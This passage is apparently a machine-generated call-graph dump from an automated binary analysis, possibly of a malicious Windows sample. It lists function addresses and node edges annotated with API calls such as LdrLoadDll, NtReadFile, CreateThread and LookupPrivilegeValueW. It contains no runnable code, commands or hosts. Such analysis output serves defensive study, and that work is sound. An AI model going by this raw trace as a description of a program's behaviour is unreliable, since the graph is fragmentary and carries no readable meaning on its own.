b3e4f0 LdrLoadDll RtlAllocateHeap 33530->33619 33532 b3710c 33532->33483 33534 b36e0b 33533->33534 33535 b36e3e 33533->33535 33536 b3c7b0 LdrLoadDll 33534->33536 33537 b36f86 33535->33537 33541 b36e5a 33535->33541 33538 b36e26 33536->33538 33539 b3c7b0 LdrLoadDll 33537->33539 33540 b3c960 2 API calls 33538->33540 33545 b36fa1 33539->33545 33542 b36e2f 33540->33542 33543 b3c7b0 LdrLoadDll 33541->33543 33542->33484 33544 b36e75 33543->33544 33547 b36e91 33544->33547 33548 b36e7c 33544->33548 33632 b3c7f0 LdrLoadDll 33545->33632 33551 b36e96 33547->33551 33552 b36eac 33547->33552 33550 b3c960 2 API calls 33548->33550 33549 b36fdb 33553 b3c960 2 API calls 33549->33553 33554 b36e85 33550->33554 33555 b3c960 2 API calls 33551->33555 33560 b36eb1 33552->33560 33620 b3e4b0 33552->33620 33556 b36fe6 33553->33556 33554->33484 33557 b36e9f 33555->33557 33556->33484 33557->33484 33568 b36ec0 33560->33568 33623 b3c8e0 33560->33623 33561 b36f14 33562 b36f2b 33561->33562 33631 b3c770 LdrLoadDll 33561->33631 33564 b36f32 33562->33564 33565 b36f47 33562->33565 33566 b3c960 2 API calls 33564->33566 33567 b3c960 2 API calls 33565->33567 33566->33568 33569 b36f50 33567->33569 33568->33484 33570 b36f7c 33569->33570 33626 b3e1d0 33569->33626 33570->33484 33572 b36f67 33573 b3e3d0 2 API calls 33572->33573 33574 b36f70 33573->33574 33574->33484 33576 b37147 33575->33576 33577 b3c7b0 LdrLoadDll 33576->33577 33578 b3717e 33577->33578 33579 b37187 33578->33579 33580 b3719c 33578->33580 33581 b3c960 2 API calls 33579->33581 33582 b371c0 33580->33582 33583 b37207 33580->33583 33596 b37190 33581->33596 33584 b3c890 2 API calls 33582->33584 33585 b37249 33583->33585 33586 b3720c 33583->33586 33587 b371e2 33584->33587 33589 b3725b 33585->33589 33595 b373d3 33585->33595 33588 b3c8e0 2 API calls 33586->33588 33586->33596 33590 b3c960 2 API calls 33587->33590 33591 b37233 33588->33591 33592 b37260 33589->33592 33601 b3729b 33589->33601 33590->33596 33593 b3c960 2 API calls 33591->33593 33594 b3c890 2 API calls 33592->33594 33597 b3723c 33593->33597 33599 b37283 33594->33599 33595->33596 33600 b3c960 2 API calls 33595->33600 33596->33466 33597->33466 33598 b372a0 33598->33596 33604 b3c890 2 API calls 33598->33604 33602 b3c960 2 API calls 33599->33602 33603 b37404 33600->33603 33601->33598 33609 b3737c 33601->33609 33605 b3728c 33602->33605 33603->33466 33606 b372c3 33604->33606 33605->33466 33607 b3c960 2 API calls 33606->33607 33608 b372ce 33607->33608 33608->33466 33609->33596 33636 b3c890 33609->33636 33612 b3c960 2 API calls 33613 b373c4 33612->33613 33613->33466 33614->33479 33616 b3d4a0 LdrLoadDll 33615->33616 33617 b376f2 33616->33617 33618 b3c7f0 LdrLoadDll 33617->33618 33618->33482 33619->33532 33633 b3cb00 33620->33633 33622 b3e4c8 33622->33560 33624 b3d4a0 LdrLoadDll 33623->33624 33625 b3c8fc NtReadFile 33624->33625 33625->33561 33627 b3e1f4 33626->33627 33628 b3e1dd 33626->33628 33627->33572 33628->33627 33629 b3e4b0 2 API calls 33628->33629 33630 b3e20b 33629->33630 33630->33572 33631->33562 33632->33549 33634 b3d4a0 LdrLoadDll 33633->33634 33635 b3cb1c RtlAllocateHeap 33634->33635 33635->33622 33637 b3d4a0 LdrLoadDll 33636->33637 33638 b3c8ac 33637->33638 33641 55d9560 LdrInitializeThunk 33638->33641 33639 b373bb 33639->33612 33641->33639 33643 b36a31 33642->33643 33645 b36a39 33642->33645 33643->33493 33644 b36d0c 33644->33493 33645->33644 33770 b3f550 33645->33770 33647 b36a8d 33648 b3f550 2 API calls 33647->33648 33652 b36a98 33648->33652 33649 b36ae6 33651 b3f550 2 API calls 33649->33651 33655 b36afa 33651->33655 33652->33649 33653 b3f680 3 API calls 33652->33653 33784 b3f5f0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 33652->33784 33653->33652 33654 b36b57 33656 b3f550 2 API calls 33654->33656 33655->33654 33775 b3f680 33655->33775 33657 b36b6d 33656->33657 33659 b36baa 33657->33659 33661 b3f680 3 API calls 33657->33661 33660 b3f550 2 API calls 33659->33660 33662 b36bb5 33660->33662 33661->33657 33663 b3f680 3 API calls 33662->33663 33670 b36bef 33662->33670 33663->33662 33666 b3f5b0 2 API calls 33667 b36cee 33666->33667 33668 b3f5b0 2 API calls 33667->33668 33669 b36cf8 33668->33669 33671 b3f5b0 2 API calls 33669->33671 33781 b3f5b0 33670->33781 33672 b36d02 33671->33672 33673 b3f5b0 2 API calls 33672->33673 33673->33644 33675 b37d91 33674->33675 33676 b37420 10 API calls 33675->33676 33681 b37da7 33676->33681 33677 b37db0 33677->33496 33678 b37de7 33679 b3e3d0 2 API calls 33678->33679 33680 b37df8 33679->33680 33680->33496 33681->33677 33681->33678 33682 b37e33 33681->33682 33683 b3e3d0 2 API calls 33682->33683 33684 b37e38 33683->33684 33684->33496 33785 b3d120 33685->33785 33687 b3d2a4 33688 b3d120 LdrLoadDll 33687->33688 33689 b3d2ad 33688->33689 33690 b3d120 LdrLoadDll 33689->33690 33691 b3d2b6 33690->33691 33692 b3d120 LdrLoadDll 33691->33692 33693 b3d2bf 33692->33693 33694 b3d120 LdrLoadDll 33693->33694 33695 b3d2c8 33694->33695 33696 b3d120 LdrLoadDll 33695->33696 33697 b3d2d1 33696->33697 33698 b3d120 LdrLoadDll 33697->33698 33699 b3d2dd 33698->33699 33700 b3d120 LdrLoadDll 33699->33700 33701 b3d2e6 33700->33701 33702 b3d120 LdrLoadDll 33701->33702 33703 b3d2ef 33702->33703 33704 b3d120 LdrLoadDll 33703->33704 33705 b3d2f8 33704->33705 33706 b3d120 LdrLoadDll 33705->33706 33707 b3d301 33706->33707 33708 b3d120 LdrLoadDll 33707->33708 33709 b3d30a 33708->33709 33710 b3d120 LdrLoadDll 33709->33710 33711 b3d316 33710->33711 33712 b3d120 LdrLoadDll 33711->33712 33713 b3d31f 33712->33713 33714 b3d120 LdrLoadDll 33713->33714 33715 b3d328 33714->33715 33716 b3d120 LdrLoadDll 33715->33716 33717 b3d331 33716->33717 33718 b3d120 LdrLoadDll 33717->33718 33719 b3d33a 33718->33719 33720 b3d120 LdrLoadDll 33719->33720 33721 b3d343 33720->33721 33722 b3d120 LdrLoadDll 33721->33722 33723 b3d34f 33722->33723 33724 b3d120 LdrLoadDll 33723->33724 33725 b3d358 33724->33725 33726 b3d120 LdrLoadDll 33725->33726 33727 b3d361 33726->33727 33728 b3d120 LdrLoadDll 33727->33728 33729 b3d36a 33728->33729 33730 b3d120 LdrLoadDll 33729->33730 33731 b3d373 33730->33731 33732 b3d120 LdrLoadDll 33731->33732 33733 b3d37c 33732->33733 33734 b3d120 LdrLoadDll 33733->33734 33735 b3d388 33734->33735 33736 b3d120 LdrLoadDll 33735->33736 33737 b3d391 33736->33737 33738 b3d120 LdrLoadDll 33737->33738 33739 b3d39a 33738->33739 33740 b3d120 LdrLoadDll 33739->33740 33741 b3d3a3 33740->33741 33742 b3d120 LdrLoadDll 33741->33742 33743 b3d3ac 33742->33743 33744 b3d120 LdrLoadDll 33743->33744 33745 b3d3b5 33744->33745 33746 b3d120 LdrLoadDll 33745->33746 33747 b3d3c1 33746->33747 33748 b3d120 LdrLoadDll 33747->33748 33749 b3d3ca 33748->33749 33750 b3d120 LdrLoadDll 33749->33750 33751 b3d3d3 33750->33751 33752 b3d120 LdrLoadDll 33751->33752 33753 b3d3dc 33752->33753 33754 b3d120 LdrLoadDll 33753->33754 33755 b3d3e5 33754->33755 33756 b3d120 LdrLoadDll 33755->33756 33757 b3d3ee 33756->33757 33758 b3d120 LdrLoadDll 33757->33758 33759 b3d3fa 33758->33759 33760 b3d120 LdrLoadDll 33759->33760 33761 b3d403 33760->33761 33762 b3d120 LdrLoadDll 33761->33762 33763 b3d40c 33762->33763 33763->33501 33765 b3d4a0 LdrLoadDll 33764->33765 33766 b3c3ac 33765->33766 33791 55d9860 LdrInitializeThunk 33766->33791 33767 b3c3c3 33767->33503 33769->33498 33771 b3f560 33770->33771 33772 b3f566 33770->33772 33771->33647 33773 b3e4b0 2 API calls 33772->33773 33774 b3f58c 33773->33774 33774->33647 33776 b3f5f0 33775->33776 33777 b3e4b0 2 API calls 33776->33777 33778 b3f64d 33776->33778 33779 b3f62a 33777->33779 33778->33655 33780 b3e3d0 2 API calls 33779->33780 33780->33778 33782 b3e3d0 2 API calls 33781->33782 33783 b36ce4 33782->33783 33783->33666 33784->33652 33786 b3d13b 33785->33786 33787 b37830 LdrLoadDll 33786->33787 33788 b3d15b 33787->33788 33789 b37830 LdrLoadDll 33788->33789 33790 b3d20f 33788->33790 33789->33790 33790->33687 33790->33790 33791->33767 33793 55d968f LdrInitializeThunk 33792->33793 33794 55d9681 33792->33794 33793->33507 33794->33507 33796 b3cb5c RtlFreeHeap 33795->33796 33797 b3d4a0 LdrLoadDll 33795->33797 33796->33511 33797->33796 33799 b27670 33798->33799 33800 b2766b 33798->33800 33801 b3e350 2 API calls 33799->33801 33800->33443 33808 b27695 33801->33808 33802 b276f8 33802->33443 33803 b3c390 2 API calls 33803->33808 33804 b276fe 33805 b27724 33804->33805 33807 b3ca90 2 API calls 33804->33807 33805->33443 33809 b27715 33807->33809 33808->33802 33808->33803 33808->33804 33810 b3e350 2 API calls 33808->33810 33814 b3ca90 33808->33814 33809->33443 33810->33808 33812 b3ca90 2 API calls 33811->33812 33813 b2793e 33812->33813 33813->33400 33815 b3d4a0 LdrLoadDll 33814->33815 33816 b3caac 33815->33816 33819 55d96e0 LdrInitializeThunk 33816->33819 33817 b3cac3 33817->33808 33819->33817 33821 b3db33 33820->33821 33822 b2b150 LdrLoadDll 33821->33822 33823 b29fed 33822->33823 33823->33406 33825 b2b4c3 33824->33825 33827 b2b540 33825->33827 33836 b3c160 LdrLoadDll 33825->33836 33827->33413 33829 b3d4a0 LdrLoadDll 33828->33829 33830 b3ccbf LookupPrivilegeValueW 33829->33830 33830->33418 33832 b3d4a0 LdrLoadDll 33831->33832 33833 b3c74c 33832->33833 33837 55d9910 LdrInitializeThunk 33833->33837 33834 b3c76b 33834->33419 33836->33827 33837->33834 33839 b2b647 33838->33839 33840 b2b4a0 LdrLoadDll 33839->33840 33841 b2b6aa 33840->33841 33841->33359 33843 b2b394 33842->33843 33888 b3c160 LdrLoadDll 33843->33888 33845 b2b3ce 33845->33361 33847 b2e33c 33846->33847 33848 b2b620 LdrLoadDll 33847->33848 33849 b2e34e 33848->33849 33889 b2e1e0 33849->33889 33852 b2e392 33852->33364 33853 b2e381 33853->33852 33857 b3c960 2 API calls 33853->33857 33854 b2e374 33854->33364 33855 b2e369 33855->33854 33856 b3c960 2 API calls 33855->33856 33856->33854 33857->33852 33859 b2c8a6 33858->33859 33860 b2c8b0 33858->33860 33859->33373 33861 b2b4a0 LdrLoadDll 33860->33861 33862 b2c921 33861->33862 33863 b2b370 LdrLoadDll 33862->33863 33864 b2c935 33863->33864 33865 b2c958 33864->33865 33866 b2b4a0 LdrLoadDll 33864->33866 33865->33373 33867 b2c974 33866->33867 33868 b37420 10 API calls 33867->33868 33869 b2c9c9 33868->33869 33869->33373 33909 b2e5d0 33870->33909 33872 b28d8a 33881 b290e1 33872->33881 33915 b36d50 33872->33915 33874 b28de6 33875 b3f550 2 API calls 33874->33875 33874->33881 33876 b28f82 33875->33876 33877 b3f680 3 API calls 33876->33877 33884 b28f97 33877->33884 33878 b27660 4 API calls 33878->33884 33881->33387 33883 b27920 2 API calls 33883->33884 33884->33878 33884->33881 33884->33883 33918 b2c5d0 33884->33918 33968 b2e570 33884->33968 33972 b2dfd0 33884->33972 33885->33367 33886->33378 33887->33384 33888->33845 33890 b2e1fa 33889->33890 33898 b2e2b0 33889->33898 33891 b2b4a0 LdrLoadDll 33890->33891 33892 b2e21c 33891->33892 33899 b3c410 33892->33899 33894 b2e25e 33903 b3c450 33894->33903 33897 b3c960 2 API calls 33897->33898 33898->33853 33898->33855 33900 b3c426 33899->33900 33901 b3d4a0 LdrLoadDll 33900->33901 33902 b3c42c 33901->33902 33902->33894 33904 b3d4a0 LdrLoadDll 33903->33904 33905 b3c46c 33904->33905 33908 55d9fe0 LdrInitializeThunk 33905->33908 33906 b2e2a4 33906->33897 33908->33906 33910 b2e5dd 33909->33910 33911 b37830 LdrLoadDll 33910->33911 33912 b2e5f5 33911->33912 33913 b2e603 33912->33913 33914 b2e5fc SetErrorMode 33912->33914 33913->33872 33914->33913 33986 b2e3a0 33915->33986 33917 b36d76 33917->33874 33919 b2c5ef 33918->33919 33920 b2c5e9 33918->33920 34013 b29bc0 33919->34013 34006 b2dca0 33920->34006 33923 b2c5fc 33924 b2c87b 33923->33924 33925 b3f680 3 API calls 33923->33925 33924->33884 33926 b2c618 33925->33926 33927 b2c62c 33926->33927 33928 b2e570 2 API calls 33926->33928 34022 b3c1e0 33927->34022 33928->33927 33931 b2c756 34029 b2c570 LdrLoadDll LdrInitializeThunk 33931->34029 33932 b3c3d0 2 API calls 33933 b2c6aa 33932->33933 33933->33931 33938 b2c6b6 33933->33938 33935 b2c775 33936 b2c77d 33935->33936 34030 b2c4e0 LdrLoadDll NtClose LdrInitializeThunk 33935->34030 33939 b3c960 2 API calls 33936->33939 33937 b2c6ff 33943 b3c960 2 API calls 33937->33943 33938->33924 33938->33937 33941 b3c4e0 2 API calls 33938->33941 33942 b2c787 33939->33942 33941->33937 33942->33884 33945 b2c71c 33943->33945 33944 b2c79f 33944->33936 33946 b2c7a6 33944->33946 34025 b3b840 33945->34025 33947 b2c7be 33946->33947 34031 b2c460 LdrLoadDll LdrInitializeThunk 33946->34031 34032 b3c260 LdrLoadDll 33947->34032 33949 b2c733 33949->33924 34028 b27ad0 LdrLoadDll 33949->34028 33952 b2c7d2 34033 b2c2c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33952->34033 33955 b2c74c 33955->33884 33956 b2c7f6 33957 b2c837 33956->33957 34034 b3c290 LdrLoadDll 33956->34034 34036 b3c2f0 LdrLoadDll 33957->34036 33960 b2c845 33962 b3c960 2 API calls 33960->33962 33961 b2c814 33961->33957 34035 b3c320 LdrLoadDll 33961->34035 33963 b2c84f 33962->33963 33964 b3c960 2 API calls 33963->33964 33966 b2c859 33964->33966 33966->33924 34037 b27ad0 LdrLoadDll 33966->34037 33969 b2e583 33968->33969 34059 b3c360 33969->34059 33973 b2dfe4 33972->33973 33976 b2e001 33972->33976 33973->33976 34065 b2dde0 33973->34065 33985 b2e040 33976->33985 34085 b2dc20 33976->34085 33979 b2e098 33979->33884 33980 b2e072 33980->33979 34108 b3af70 12 API calls 33980->34108 33984 b37420 10 API calls 33984->33985 33985->33980 34107 b2d5d0 12 API calls 33985->34107 33987 b2e3bd 33986->33987 33993 b3c490 33987->33993 33989 b2e405 33989->33917 33994 b3d4a0 LdrLoadDll 33993->33994 33995 b3c4ac 33994->33995 34004 55d99a0 LdrInitializeThunk 33995->34004 33996 b2e3fe 33996->33989 33998 b3c4e0 33996->33998 33999 b3c4e6 33998->33999 34000 b3d4a0 LdrLoadDll 33999->34000 34001 b3c4fc 34000->34001 34005 55d9780 LdrInitializeThunk 34001->34005 34002 b2e42e 34002->33917 34004->33996 34005->34002 34038 b2d650 34006->34038 34008 b3e4b0 2 API calls 34009 b2ddd1 34008->34009 34009->33919 34010 b2dcbe 34012 b2ddc2 34010->34012 34047 b3b6c0 34010->34047 34012->34008 34014 b29bdb 34013->34014 34015 b2e1e0 3 API calls 34014->34015 34021 b29cfb 34014->34021 34016 b29cdc 34015->34016 34017 b29d0a 34016->34017 34018 b29cf1 34016->34018 34019 b3c960 2 API calls 34016->34019 34017->33923 34058 b26c90 LdrLoadDll 34018->34058 34019->34018 34021->33923 34023 b3d4a0 LdrLoadDll 34022->34023 34024 b2c680 34023->34024 34024->33924 34024->33931 34024->33932 34026 b2e570 2 API calls 34025->34026 34027 b3b872 34026->34027 34027->33949 34028->33955 34029->33935 34030->33944 34031->33947 34032->33952 34033->33956 34034->33961 34035->33957 34036->33960 34037->33924 34039 b2d683 34038->34039 34053 b2b790 34039->34053 34041 b2d695 34042 b2e3a0 3 API calls 34041->34042 34043 b2d6d8 34042->34043 34044 b2d6df 34043->34044 34057 b3e4f0 LdrLoadDll RtlAllocateHeap 34043->34057 34044->34010 34046 b2d6ef 34046->34010 34048 b3b6cf 34047->34048 34049 b37830 LdrLoadDll 34048->34049 34051 b3b6e7 34049->34051 34050 b3b70d 34050->34012 34051->34050 34052 b3b6fa CreateThread 34051->34052 34052->34012 34054 b2b7b7 34053->34054 34055 b2b4a0 LdrLoadDll 34054->34055 34056 b2b7f3 34055->34056 34056->34041 34057->34046 34058->34021 34060 b3d4a0 LdrLoadDll 34059->34060 34061 b3c37c 34060->34061 34064 55d9840 LdrInitializeThunk 34061->34064 34062 b2e5ae 34062->33884 34064->34062 34066 b2de10 34065->34066 34109 b36740 34066->34109 34068 b2de61 34138 b355b0 34068->34138 34070 b2de67 34172 b323a0 34070->34172 34072 b2de6d 34203 b34610 34072->34203 34078 b2de81 34247 b35e50 34078->34247 34080 b2de87 34271 b2fce0 34080->34271 34082 b2de9f 34286 b30f80 34082->34286 34086 b2dc8f 34085->34086 34087 b2dc38 34085->34087 34086->33979 34091 b2da60 34086->34091 34087->34086 34088 b311c0 10 API calls 34087->34088 34089 b2dc79 34088->34089 34089->34086 34562 b31410 12 API calls 34089->34562 34092 b2da7c 34091->34092 34106 b2db5b 34091->34106 34094 b3c960 2 API calls 34092->34094 34092->34106 34093 b2dbf1 34095 b2dc0e 34093->34095 34097 b37420 10 API calls 34093->34097 34096 b2da97 34094->34096 34095->33984 34095->33985 34563 b2cf50 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 34096->34563 34097->34095 34099 b2dbcb 34099->34093 34565 b2d120 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 34099->34565 34101 b2dacf 34103 b2b4a0 LdrLoadDll 34101->34103 34104 b2dae0 34103->34104 34105 b2b4a0 LdrLoadDll 34104->34105 34105->34106 34106->34093 34564 b2cf50 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 34106->34564 34107->33980 34108->33979 34110 b36768 34109->34110 34111 b2b4a0 LdrLoadDll 34110->34111 34112 b3677c 34111->34112 34113 b2cd10 3 API calls 34112->34113 34115 b367af 34113->34115 34114 b367b6 34114->34068 34115->34114 34116 b2b4a0 LdrLoadDll 34115->34116 34117 b367de 34116->34117 34118 b2b4a0 LdrLoadDll 34117->34118 34119 b36802 34118->34119 34291 b2cdd0 34119->34291 34121 b36868 34124 b2b4a0 LdrLoadDll 34121->34124 34122 b36826 34122->34121 34123 b369eb 34122->34123 34295 b36490 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 34122->34295 34123->34068 34126 b36888 34124->34126 34127 b2cdd0 2 API calls 34126->34127 34129 b368ac 34127->34129 34128 b2cdd0 2 API calls 34133 b36922 34128->34133 34129->34123 34131 b368f2 34129->34131 34296 b36490 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 34129->34296 34131->34128 34132 b36968 34135 b2cdd0 2 API calls 34132->34135 34133->34123 34133->34132 34297 b36490 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 34133->34297 34136 b369c7 34135->34136 34136->34123 34298 b36490 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 34136->34298 34139 b35614 34138->34139 34140 b2b4a0 LdrLoadDll 34139->34140 34141 b356e1 34140->34141 34142 b2cd10 3 API calls 34141->34142 34144 b35714 34142->34144 34143 b3571b 34143->34070 34144->34143 34145 b2b4a0 LdrLoadDll 34144->34145 34146 b35743 34145->34146 34147 b2cdd0 2 API calls 34146->34147 34148 b35783 34147->34148 34149 b358b2 34148->34149 34170 b358a3 34148->34170 34305 b353a0 34148->34305 34150 b3c960 2 API calls 34149->34150 34152 b358bc 34150->34152 34152->34070 34153 b357b8 34153->34149 34154 b357c3 34153->34154 34155 b3e4b0 2 API calls 34154->34155 34156 b357ec 34155->34156 34157 b357f5 34156->34157 34158 b3580b 34156->34158 34160 b3c960 2 API calls 34157->34160 34334 b35290 CoInitialize 34158->34334 34162 b357ff 34160->34162 34161 b35819 34336 b3c670 34161->34336 34162->34070 34164 b35892 34165 b3c960 2 API calls 34164->34165 34167 b3589c 34165->34167 34168 b3e3d0 2 API calls 34167->34168 34168->34170 34169 b35837 34169->34164 34171 b3c670 2 API calls 34169->34171 34341 b351c0 LdrLoadDll RtlFreeHeap 34169->34341 34170->34070 34171->34169 34173 b323c8 34172->34173 34174 b3e4b0 2 API calls 34173->34174 34176 b32428 34174->34176 34175 b32431 34175->34072 34176->34175 34343 b31800 34176->34343 34178 b3245a 34179 b3247a 34178->34179 34373 b31b10 LdrLoadDll 34178->34373 34181 b32498 34179->34181 34375 b34110 12 API calls 34179->34375 34188 b324b2 34181->34188 34377 b2b2a0 LdrLoadDll 34181->34377 34182 b32468 34182->34179 34374 b32120 10 API calls 34182->34374 34184 b3248c 34376 b34110 12 API calls 34184->34376 34189 b31800 12 API calls 34188->34189 34190 b324df 34189->34190 34191 b32500 34190->34191 34378 b31b10 LdrLoadDll 34190->34378 34193 b3251e 34191->34193 34380 b34110 12 API calls 34191->34380 34195 b32538 34193->34195 34382 b2b2a0 LdrLoadDll 34193->34382 34199 b3e3d0 2 API calls 34195->34199 34196 b324ee 34196->34191 34379 b32120 10 API calls 34196->34379 34197 b32512 34381 b34110 12 API calls 34197->34381 34201 b32542 34199->34201 34201->34072 34204 b34636 34203->34204 34205 b2b4a0 LdrLoadDll 34204->34205 34206 b34665 34205->34206 34207 b2b4a0 LdrLoadDll 34206->34207 34208 b34691 34206->34208 34207->34208 34402 b2e7d0 34208->34402 34210 b34775 34211 b2de75 34210->34211 34407 b34320 34210->34407 34213 b358d0 34211->34213 34214 b34610 12 API calls 34213->34214 34215 b2de7b 34214->34215 34216 b33330 34215->34216 34217 b33352 34216->34217 34218 b2b4a0 LdrLoadDll 34217->34218 34219 b3351d 34218->34219 34220 b2b4a0 LdrLoadDll 34219->34220 34221 b3352e 34220->34221 34222 b2b370 LdrLoadDll 34221->34222 34223 b33545 34222->34223 34487 b331f0 34223->34487 34226 b331f0 13 API calls 34227 b335bb 34226->34227 34228 b331f0 13 API calls 34227->34228 34229 b335d3 34228->34229 34230 b331f0 13 API calls 34229->34230 34231 b335eb 34230->34231 34232 b331f0 13 API calls 34231->34232 34233 b33603 34232->34233 34234 b331f0 13 API calls 34233->34234 34236 b3361e 34234->34236 34235 b33638 34235->34078 34236->34235 34237 b331f0 13 API calls 34236->34237 34238 b3366c 34237->34238 34239 b331f0 13 API calls 34238->34239 34240 b336a9 34239->34240 34241 b331f0 13 API calls 34240->34241 34242 b336e6 34241->34242 34243 b331f0 13 API calls 34242->34243 34244 b33723 34243->34244 34245 b331f0 13 API calls 34244->34245 34246 b33760 34245->34246 34246->34078 34248 b35e59 34247->34248 34249 b2b150 LdrLoadDll 34248->34249 34250 b35e88 34249->34250 34251 b37830 LdrLoadDll 34250->34251 34268 b3608c 34250->34268 34252 b35eb8 34251->34252 34253 b37830 LdrLoadDll 34252->34253 34254 b35ed1 34253->34254 34255 b37830 LdrLoadDll 34254->34255 34256 b35eea 34255->34256 34257 b37830 LdrLoadDll 34256->34257 34258 b35f06 34257->34258 34259 b37830 LdrLoadDll 34258->34259 34260 b35f1f 34259->34260 34261 b37830 LdrLoadDll 34260->34261 34262 b35f38 34261->34262 34263 b37830 LdrLoadDll 34262->34263 34264 b35f54 34263->34264 34265 b37830 LdrLoadDll 34264->34265 34266 b35f6d 34265->34266 34267 b37830 LdrLoadDll 34266->34267 34269 b35f85 34267->34269 34268->34080 34269->34268 34502 b35a10 LdrLoadDll 34269->34502 34272 b2fcf6 34271->34272 34282 b2fd01 34271->34282 34273 b3e4b0 2 API calls 34272->34273 34273->34282 34274 b2fd17 34274->34082 34275 b37830 LdrLoadDll 34275->34282 34276 b2fdfc GetFileAttributesW 34276->34282 34277 b2ff7f 34278 b2ff98 34277->34278 34279 b3e3d0 2 API calls 34277->34279 34278->34082 34279->34278 34281 b2b4a0 LdrLoadDll 34281->34282 34282->34274 34282->34275 34282->34276 34282->34277 34282->34281 34283 b33770 10 API calls 34282->34283 34503 b3ab60 34282->34503 34507 b3a9f0 11 API calls 34282->34507 34508 b3a890 11 API calls 34282->34508 34283->34282 34509 b30d00 34286->34509 34288 b30f8d 34530 b309e0 34288->34530 34290 b2deb1 34290->33976 34292 b2cdf5 34291->34292 34299 b3c560 34292->34299 34295->34121 34296->34131 34297->34132 34298->34123 34300 b3d4a0 LdrLoadDll 34299->34300 34301 b3c57c 34300->34301 34304 55d96d0 LdrInitializeThunk 34301->34304 34302 b2ce69 34302->34122 34304->34302 34306 b353bc 34305->34306 34307 b2b150 LdrLoadDll 34306->34307 34309 b353d7 34307->34309 34308 b353e0 34308->34153 34309->34308 34310 b37830 LdrLoadDll 34309->34310 34311 b353fd 34310->34311 34312 b37830 LdrLoadDll 34311->34312 34313 b35418 34312->34313 34314 b37830 LdrLoadDll 34313->34314 34315 b35431 34314->34315 34316 b37830 LdrLoadDll 34315->34316 34317 b3544d 34316->34317 34318 b37830 LdrLoadDll 34317->34318 34319 b35466 34318->34319 34320 b37830 LdrLoadDll 34319->34320 34321 b3547f 34320->34321 34322 b2b150 LdrLoadDll 34321->34322 34324 b354ab 34322->34324 34323 b35559 34323->34153 34324->34323 34325 b37830 LdrLoadDll 34324->34325 34326 b354cf 34325->34326 34327 b2b150 LdrLoadDll 34326->34327 34328 b35504 34327->34328 34328->34323 34329 b37830 LdrLoadDll 34328->34329 34330 b35527 34329->34330 34331 b37830 LdrLoadDll 34330->34331 34332 b35540 34331->34332 34333 b37830 LdrLoadDll 34332->34333 34333->34323 34335 b352f5 34334->34335 34335->34161 34337 b3d4a0 LdrLoadDll 34336->34337 34338 b3c68c 34337->34338 34342 55d9610 LdrInitializeThunk 34338->34342 34339 b3c6ab 34339->34169 34341->34169 34342->34339 34344 b31898 34343->34344 34345 b2b4a0 LdrLoadDll 34344->34345 34346 b31936 34345->34346 34347 b2b4a0 LdrLoadDll 34346->34347 34348 b31951 34347->34348 34349 b2cdd0 2 API calls 34348->34349 34350 b31976 34349->34350 34351 b31abd 34350->34351 34395 b3c5f0 34350->34395 34352 b31ace 34351->34352 34383 b311c0 34351->34383 34352->34178 34356 b31ab3 34357 b3c960 2 API calls 34356->34357 34357->34351 34358 b319af 34359 b3c960 2 API calls 34358->34359 34360 b319e9 34359->34360 34400 b3e590 LdrLoadDll 34360->34400 34362 b31a1f 34362->34352 34363 b2cdd0 2 API calls 34362->34363 34364 b31a45 34363->34364 34364->34352 34365 b3c5f0 2 API calls 34364->34365 34366 b31a6a 34365->34366 34367 b31a71 34366->34367 34368 b31a9d 34366->34368 34369 b3c960 2 API calls 34367->34369 34370 b3c960 2 API calls 34368->34370 34371 b31a7b 34369->34371 34372 b31aa7 34370->34372 34371->34178 34372->34178 34373->34182 34374->34179 34375->34184 34376->34181 34377->34188 34378->34196 34379->34191 34380->34197 34381->34193 34382->34195 34384 b311e5 34383->34384 34385 b2b4a0 LdrLoadDll 34384->34385 34386 b312a0 34385->34386 34387 b2b4a0 LdrLoadDll 34386->34387 34388 b312c4 34387->34388 34389 b37420 10 API calls 34388->34389 34390 b31317 34389->34390 34391 b2b4a0 LdrLoadDll 34390->34391 34394 b313d1 34390->34394 34392 b3137e 34391->34392 34393 b37420 10 API calls 34392->34393 34393->34394 34394->34352 34396 b3d4a0 LdrLoadDll 34395->34396 34397 b3c60c 34396->34397 34401 55d9650 LdrInitializeThunk 34397->34401 34398 b319a4 34398->34356 34398->34358 34400->34362 34401->34398 34403 b37830 LdrLoadDll 34402->34403 34404 b2e7ef 34403->34404 34405 b2e7f6 GetFileAttributesW 34404->34405 34406 b2e801 34404->34406 34405->34406 34406->34210 34431 b3acc0 34407->34431 34409 b3438b 34409->34210 34410 b34336 34410->34409 34411 b34397 34410->34411 34412 b34355 34410->34412 34413 b2b4a0 LdrLoadDll 34411->34413 34414 b3437a 34412->34414 34415 b3435d 34412->34415 34416 b343a8 34413->34416 34418 b3e3d0 2 API calls 34414->34418 34417 b3e3d0 2 API calls 34415->34417 34420 b37420 10 API calls 34416->34420 34419 b3436e 34417->34419 34418->34409 34419->34210 34421 b343bf 34420->34421 34471 b33770 34421->34471 34423 b343ca 34427 b344c8 34423->34427 34428 b343e2 34423->34428 34424 b344af 34425 b3e3d0 2 API calls 34424->34425 34426 b345d3 34425->34426 34426->34210 34427->34424 34482 b33d00 11 API calls 34427->34482 34428->34424 34481 b33d00 11 API calls 34428->34481 34432 b3acce 34431->34432 34433 b3acd5 34431->34433 34432->34410 34434 b2b150 LdrLoadDll 34433->34434 34435 b3ad07 34434->34435 34436 b3ad16 34435->34436 34483 b3a7b0 LdrLoadDll 34435->34483 34438 b3e4b0 2 API calls 34436->34438 34440 b3aef9 34436->34440 34439 b3ad2f 34438->34439 34439->34440 34441 b3ad44 34439->34441 34442 b3aea8 34439->34442 34440->34410 34484 b33850 LdrLoadDll 34441->34484 34443 b3aeb2 34442->34443 34444 b3af4b 34442->34444 34485 b33850 LdrLoadDll 34443->34485 34448 b3e3d0 2 API calls 34444->34448 34446 b3ad5b 34451 b37830 LdrLoadDll 34446->34451 34448->34440 34449 b3aec9 34486 b3a0e0 LdrLoadDll 34449->34486 34453 b3ad77 34451->34453 34452 b3aedf 34454 b37830 LdrLoadDll 